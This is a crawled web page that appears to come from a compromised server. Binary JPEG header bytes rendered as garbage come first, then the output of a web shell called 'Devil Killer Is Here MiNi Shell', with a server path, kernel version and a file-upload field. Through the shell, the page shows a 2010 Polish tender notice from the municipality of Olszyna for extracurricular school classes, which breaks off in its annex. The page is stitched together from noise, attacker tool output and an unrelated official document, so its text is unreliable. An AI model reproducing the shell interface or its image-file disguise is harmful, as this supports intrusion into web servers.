JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100202/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100202/29240-N-2010.html

<p class="kh_header"><b>Olszyna: prowadzeniu zajęć pozalekcyjnych/pozaszkolnych ukierunkowanych na rozwój kompetencji kluczowych  w oparciu  o programy rozwojowe szkół dla których organem prowadzącym jest gmina Olszyna w ramach realizacji PROJEKTU: EINSTEIN-KAŻDY MA W SOBIE UKRYTY POTENCJAŁ współfinansowanego przez Unię Europejską ze środków EFS w ramach PROGRAMU OPERACYJNEGO KAPITAŁ LUDZKI  podziałanie 9.1.2 - Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych.</b><br>
<b>Numer ogłoszenia: 29240 - 2010; data zamieszczenia: 02.02.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Olszyna , ul. Wolności 6, 59-830 Olszyna, woj. dolnośląskie, tel. 075 7212368, faks 075 7212050.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.olszyna.bip.net.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> prowadzeniu zajęć pozalekcyjnych/pozaszkolnych ukierunkowanych na rozwój kompetencji kluczowych  w oparciu  o programy rozwojowe szkół dla których organem prowadzącym jest gmina Olszyna w ramach realizacji PROJEKTU: EINSTEIN-KAŻDY MA W SOBIE UKRYTY POTENCJAŁ współfinansowanego przez Unię Europejską ze środków EFS w ramach PROGRAMU OPERACYJNEGO KAPITAŁ LUDZKI  podziałanie 9.1.2 - Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest prowadzenie w 5 szkołach zajęć pozalekcyjnych i pozaszkolnych ukierunkowanych na rozwój kompetencji kluczowych w oparciu o programy rozwojowe szkół, dla których organem prowadzącym jest gmina Olszyna.

CZĘŚĆ 1  
Szkoła Podstawowa Nr 1 w Olszynie, ul. Świerczewskiego 20, 59-830 Olszyna.

Zadanie 1. Zimowe spotkania z przyrodą - ilość godzin 55, liczba uczestników 200.
Planowane działania:
1.	Zajęcia warsztatowe - 40 godzin,
2.	wycieczka - 15 godzin.


Zadanie 2. - Zajęcia  rozwijające zainteresowania językowe i umiejętności komunikacyjne uczniów-  ilość godzin 391, liczba uczestników 200.
Planowane działania:
1.	zajęcia warsztatowo- konwersacyjne z jęz. angielskiego dla dzieci młodszych - 104,
2.	zajęcia warsztatowo- konwersacyjne z języka angielskiego dla dzieci starszych- 104,
3.	zajęcia warsztatowo- konwersacyjne z języka niemieckiego dla dzieci młodszych - 52,
4.	zajęcia warsztatowo- konwersacyjne z języka niemieckiego dla dzieci starszych - 52
5.	warsztaty rozwijające umiejętności komunikacyjne - 79

Zadanie 3. Zajęcia  rozwijające zainteresowania i umiejętności matematyczno- przyrodnicze, informacyjne i przedsiębiorczość- ilość godzin 201, liczba uczestników 45
 Planowane działania:
1.	warsztaty informatyczno- matematyczne dla dzieci starszych-52
2.	warsztaty matematyczno- przyrodniczo-informatyczne dla dzieci młodszych-45,
3.	warsztaty badawczo-matematyczno- przyrodnicze dla dzieci starszych- 104.

Zadanie 4. -   Projekt edukacyjny Wyprawa po złote runo - ilość godzin 64, liczba uczestników 160.
Planowane działania
1.	zajęcia warsztatowe-16 godzin,
2.	wycieczka 1-24 godziny,
3.	wycieczka 2 - 24 godziny.
CZĘŚĆ 2
Szkoła Podstawowa nr 2 im. Kombatantów Ziemi Olszyńskiej w Olszynie,               ul. Wolności 69, 59-830 Olszyna.


Zadanie 1.  Koło multimedialne - ilość godzin 100, liczba uczestników 20
Planowane działania:
1.	warsztaty multimedialne 1 - 45 godzin,
2.	warsztaty multimedialne 2 -55 godzin.


Zadanie 2- Kółko przyrodnicze- ilość godzin 45, liczba uczestników 30,
Planowane działania:
1.	warsztaty przyrodnicze 1 - 15 godzin,
2.	warsztaty przyrodnicze 2 - 15 godzin,

Zadanie 3. - Kółko matematyczne - liczba godzin 60, liczba uczestników 20,
Planowane działania:
1.	warsztaty matematyczne 1 - 30 godzin,
2.	warsztaty matematyczne 2 - 30 godzin.

Zadanie 4. - Kółko języka niemieckiego - ilość godzin 15,liczba uczestników 15
Planowane działania:
1.	Zajęcia edukacyjne - 15 godzin.

Zadanie 5. - Uczymy się przez doświadczenie - liczba godzin 80, liczba uczestników 42,
Planowane działania: 
1.	Wycieczka do Jeleniej Góry - maj 2010 r. - 32 godziny,
2.	Wycieczka do Świeradowa Zdroju - maj 2010 r.  - 16 godzin,
3.	Wycieczka do Lubania - maj 2010 r. - 32 godziny.

Zadanie 6. - Szkolny Festiwal Nauki - liczba godzina 36 , liczba uczestników 62
Planowane działania:
1.	zajęcia opiekuńczo-wychowawcze - 36 godzin.

CZĘŚĆ 3  
Szkoła Podstawowa Nr 3  im. T. Kościuszki w Olszynie, ul. Wolności 17, 59-830 Olszyna

Zadanie 1. - Warsztaty artystyczno-przyrodnicze z elementami wiedzy o regionie   kl. I-III - ilość godzin 46, liczba uczestników 20
planowane działania:

1.	warsztaty - 36 godzin,
2.	wycieczka 1 - 5 godziny,
3.   wycieczka  2 - 5 godzin.
Zadanie 2. - Koło regionalno - teatralne - ilość godzin 41, liczba uczestników 20
Planowane działania:
1.	koło - zajęcia - 36 godzin,
2.	wycieczka do teatru 5 godzin.

Zadanie 3. - Zajęcia przyrodniczo - matematyczne dla klas I - III - ilość godzin 54, liczba uczestników 10,
Planowane działania:

1.	warsztaty  - 48 godzin,
2.	podsumowanie zajęć - 6 godzin.

Zadanie 4. - Koło Młodego Regionalisty w kl. IV - VI- liczba godzin 38, liczba uczestników 20
Planowane działania:
1.	koło - 26 godzin,
2.	wycieczka do teatru - 8 godzin,
3.	podsumowanie zajęć - 4 godziny.

Zadanie 5. - Warsztaty artystyczne Moja mała Ojczyzna w kl. IV-VI - liczna godzin 46, liczba uczestników 20
Planowane działania:
1.	warsztaty - 36 godzin,
2.	wycieczka 1 - 5 godzin,
3.	wycieczka 2 - 5 godzin,

Zadanie 6. - Koło przyrodnicze dla klas IV - VI - liczna godzin 103, liczba uczestników 20
Planowane działania:
1.	koło - 87 godzin,
2.	wycieczka Bank Nasion - 8 godzin,
1.	wycieczka Wrocław - 8 godzin.
Zadanie 7. - Warsztaty matematyczno - przyrodnicze dla klas IV - VI - liczba godzin 74, liczba uczestników 20
planowane działania:
1.	warsztaty - 50 godzin,
2.	wycieczka 1 -8 godzin,
3.	wycieczka 2 -8 godzin,
4.	wycieczka 3 -8 godziny.

Zadanie 8.. - Warsztaty regionalne - liczba godzin 138, liczba uczestników 20
Planowane działania: warsztaty - 138 godzin.

Zadanie 9. - Warsztaty wspomagające w kl. I - III- liczba godzin 94, liczba uczestników 12
Planowane działania: warsztaty,

Zadanie 10. - Warsztaty wspomagające w kl. IV- VI- liczba godzin 141, liczba uczestników 20
planowane działania: warsztaty - 141 godzin.

CZĘŚĆ 4
Szkoła Podstawowa  im. Janusza Korczaka w Biedrzychowicach, Biedrzychowice 93,
59-830 Olszyna

Zadanie 1.  Niemiecki nic trudnego- planowana liczba godzin 144, liczba uczestników 30
Planowane działania:
1.	warsztaty - 40 godzin,
2.	gry zabawy językowe - 40 godzin,
3.	wystawy - 5 godzin,
4.	dzień języka niemieckiego - 5 godzin,
5.	konkurs - 26 godzin,
6.	piknik Klubu Odkrywców- 14 godzin,
7.	gazetka - 14 godzin.

Zadanie 2. - Gry i zabawy z językiem angielskim- liczna godzin 115, liczba uczestników 30
Planowane działania:
1.	warsztaty - 35 godzin,
2.	gry zabawy językowe - 37 godzin,
3.	wystawy- 14 godzin,
4.	konkurs - 15 godzin,
5.	piknik Klubu Odkrywców - 14 godzin.

Zadanie 3. - Odkrywamy świat roślin i zwierząt- liczna godzin 168, liczba uczestników 20  
Planowane działania:
1.	warsztaty  - 45 godzin,
2.	Wycieczka 1 - 16 godzin,
3.	Wycieczka 2 - 3 godzin,
4.	Wycieczka 3 - 10 godzin,
5.	zajęcia badawcze ? - 15 godzin,
6.	zajęcia praktyczne - 30 godzin
7.	zajęcia plastyczne - 25 godzin,
8.	wystawa - 10 godzin,
9.	piknik Klubu Odkrywców - 14 godzin.


Zadanie 4. - Śladami przeszłości  - liczna godzin 185, liczba uczestników 20
1.	warsztaty - 60 godzin,
2.	wycieczka 1 - 4 godzin,
3.	wycieczka 2 -14 godzin,
4.	wycieczka rowerowa - 16 godzin,
5.	wystawa - 30 godzin,
6.	zajęcia badawcze - 35 godzin,
7.	konkurs - 12 godzin,
8.	piknik Klubu Odkrywców - 14 godzin.

CZĘŚĆ 5
Gminne Gimnazjum Publiczne w Olszynie,  ul. Wolności 17, 59-830 Olszyna.

Zadanie 1. - Tutaj mieszkam, uczę się i wypoczywam - liczba godzin 69, liczba uczestników 30,
planowane działania:
1.	zajęcia dydaktyczne - 65 godzin,
2.	podsumowanie (prezentacja i ewaluacja) - 4 godziny.

Zadanie 2. - Zajęcia wspierające uczniów w przygotowaniu do egzaminu gimnazjalnego w bloku przedmiotów matematyczno-przyrodniczych.- liczba godzin 412, liczba uczestników 140  
planowane działania:
1.	Zajęcia pozalekcyjne: matematyka, biologia, fizyka, chemia, geografia, gry logiczne - 412 godzin,

Zadanie 3. - Zajęcia pozalekcyjne rozbudzające zainteresowania uczniów historią regionu- liczba godzin 84, liczba uczestników 30
  planowane działania:
1.	zajęcia dydaktyczne- 80 godzin,
2.	podsumowanie zadania 4 godziny.

Zadanie 4. - Powietrze to ocean życia- liczba godzin 70, liczba uczestników 30
planowane działania:
1.	zajęcia dydaktyczne - 
2.	badanie stanu czystości powietrza,
3.	wywiad,
4.	wystawa - zanieczyszczenia powietrza,
5.	wystawa fotograficzna - Najciekawsze zjawisko pogodowe,
6.	ankieta,
7.	podsumowanie.

Zadanie 5. - Uczestniczę w tworzeniu społeczeństwa informatycznego- liczba godzin 102, liczba uczestników 48
planowane działania:
1.	zajęcia dydaktyczne

Zadanie 6. - Orientacja zawodowa i szkolna- liczba godzin 212, liczba uczestników 200
planowane działania:
1.	zajęcia dydaktyczne,
2.	krok w przyszłość,
3.	praca w życiu człowieka,
4.	rozmowa kwalifikacyjna,
5.	bal zawodowy,
6.	wycieczka Olszyna-Gryfów Śl.,
7.	wycieczka Radogoszcz,
8.	wycieczka Lubań,
9.	wycieczka Gryfów.

Zadanie 7. - Uchwycone w kadrze  - liczba godzin 138, liczba uczestników 30
planowane działania:
1.	zajęcia dydaktyczne .
2.	zgromadzenie filmoteki
3.	wyjazd edukacyjny Jelenia Góra,
4.	wyjazd edukacyjny - kino multimedialne Jelenia G. lub Zgorzelec

Zadanie 8. - Dzień nauki Drzwi muz są otwarte - każdy może wejść do krainy nauki- liczba godzin 64, liczba uczestników 200
planowane działania:
1.	zajęcia dydaktyczne
2.	prezentacja

Zadanie 9. - Wskaźnikiem po mapie -rowerem po regonie - liczba godzin 122, liczba uczestników 30
planowane działania:
1.	zajęcia dydaktyczne,
2.	projektowanie tras wycieczek rowerowych,
3.	wycieczki

Zadanie 10. - Historia, polityka i literatura z przyrodą w tle - liczba godzin 150, liczba uczestników 30
planowane działania:

1.	zajęcia dydaktyczne
2.	wycieczka trasą parków i pałaców,
3.	szlakiem wygasłych wulkanów,
4.	spotkanie z literaturą i sztuka regionu,
5.	rajd trasą obozów pracy w Olszynie, Lubaniu, Leśnej i Żaganiu,
6.	rezerwat przyrodniczy,
7.	śladami pałaców rzeki Kwisy,
8.	rajd historia i przyroda razem,
9.	śladami twórców regionu..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamówienie uzupełniające może zostać udzielone zgodnie z przedmiotem zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 16.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadają wykształcenie wyższe - pedagogiczne lub licencjat w rozumieniu Rozporządzenia Ministra Edukacji Narodowej z dnia 12 marca 2009 roku (Dz. U. z 2009 Nr 50 poz. 400) w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli nie mających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli. Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia/niespełna.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>2.	Wykonawca może polegać na wiedzy i doświadczeniu, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia , zgodnie z § 3 pkt.3 - projektu umowy. (Zleceniobiorca jest zobowiązany do osobistego wykonania zleconych czynności . Powierzenie wykonania w całości lub części zlecenia osobie trzeciej wymaga pisemnej zgody Zleceniodawcy . Za osoby, którymi Zleceniobiorca się posłużył lub za pomocą których zlecenie wykonuje, odpowiada on na zasadzie ryzyka jak za działanie własne).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.olszyna.bip.net.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Olszynie
ul. Wolności 6
59-830 Olszyna.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.02.2010 godzina 12:00, miejsce: Urząd Miejski w Olszynie
ul. Wolności 6
59-830 Olszyna
sekretariat, pok. nr 5, I piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> PROJEKT: EINSTEIN-KAŻDY MA W SOBIE UKRYTY POTENCJAŁ współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach PROGRAMU OPERACYJNEGO KAPITAŁ LUDZKI  podziałanie 9.1.2 - Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Szkoła Podstawowa Nr 1 w Olszynie, ul. Świerczewskiego 20, 59-830 Olszyna..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 1. Zimowe spotkania z przyrodą - ilość godzin 55, liczba uczestników 200.
Planowane działania:
1.	Zajęcia warsztatowe - 40 godzin,
2.	wycieczka - 15 godzin.


Zadanie 2. -Zajęcia  rozwijające zainteresowania językowe i umiejętności komunikacyjne uczniów -  ilość godzin 391, liczba uczestników 200.
Planowane działania:
1.	zajęcia warsztatowo- konwersacyjne z jęz. angielskiego dla dzieci młodszych - 104,
2.	zajęcia warsztatowo- konwersacyjne z języka angielskiego dla dzieci starszych- 104,
3.	zajęcia warsztatowo- konwersacyjne z języka niemieckiego dla dzieci młodszych - 52,
4.	zajęcia warsztatowo- konwersacyjne z języka niemieckiego dla dzieci starszych - 52
5.	warsztaty rozwijające umiejętności komunikacyjne - 79

Zadanie 3. Zajęcia  rozwijające zainteresowania i umiejętności matematyczno- przyrodnicze, informacyjne i przedsiębiorczość - ilość godzin 201, liczba uczestników 45
 Planowane działania:
1.	warsztaty informatyczno- matematyczne dla dzieci starszych-52
2.	warsztaty matematyczno- przyrodniczo-informatyczne dla dzieci młodszych-45,
3.	warsztaty badawczo-matematyczno- przyrodnicze dla dzieci starszych- 104.

Zadanie 4. -   Projekt edukacyjny Wyprawa po złote runo - ilość godzin 64, liczba uczestników 160.
Planowane działania
1.	zajęcia warsztatowe-16 godzin,
2.	wycieczka 1-24 godziny,
3.	wycieczka 2 - 24 godziny..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 16.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Szkoła Podstawowa nr 2 im. Kombatantów Ziemi Olszyńskiej w Olszynie                                       ul. Wolności 69, 59-830 Olszyna..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 1.  Koło multimedialne - ilość godzin 100, liczba uczestników 20
Planowane działania:
1.	warsztaty multimedialne 1 - 45 godzin,
2.	warsztaty multimedialne 2 -55 godzin.


Zadanie 2- Kółko przyrodnicze - ilość godzin 45, liczba uczestników 30,
Planowane działania:
1.	warsztaty przyrodnicze 1 - 15 godzin,
2.	warsztaty przyrodnicze 2 - 15 godzin,

Zadanie 3. - Kółko matematyczne  - liczba godzin 60, liczba uczestników 20,
Planowane działania:
1.	warsztaty matematyczne 1 - 30 godzin,
2.	warsztaty matematyczne 2 - 30 godzin.

Zadanie 4. - Kółko języka niemieckiego - ilość godzin 15,liczba uczestników 15
Planowane działania:
1.	Zajęcia edukacyjne - 15 godzin.

Zadanie 5. - Uczymy się przez doświadczenie - liczba godzin 80, liczba uczestników 42,
Planowane działania: 
1.	Wycieczka do Jeleniej Góry - maj 2010 r. - 32 godziny,
2.	Wycieczka do Świeradowa Zdroju - maj 2010 r.  - 16 godzin,
3.	Wycieczka do Lubania - maj 2010 r. - 32 godziny.

Zadanie 6. - Szkolny Festiwal Nauki - liczba godzina 36 , liczba uczestników 62
Planowane działania:
1.	zajęcia opiekuńczo-wychowawcze - 36 godzin..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 16.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Szkoła Podstawowa Nr 3  im. T. Kościuszki w Olszynie, ul. Wolności 17, 59-830 Olszyna.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 1. - Warsztaty artystyczno-przyrodnicze z elementami wiedzy o regionie   kl. I-III - ilość godzin 46, liczba uczestników 20
planowane działania:

1.	warsztaty - 36 godzin,
2.	wycieczka 1 - 5 godziny,
3.   wycieczka  2 - 5 godzin.
Zadanie 2. - Koło regionalno - teatralne - ilość godzin 41, liczba uczestników 20
Planowane działania:
1.	koło - zajęcia - 36 godzin,
2.	wycieczka do teatru 5 godzin.


Zadanie 3. - Zajęcia przyrodniczo - matematyczne dla klas I - III  - ilość godzin 54, liczba uczestników 10,
Planowane działania:

1.	warsztaty  - 48 godzin,
2.	podsumowanie zajęć - 6 godzin.

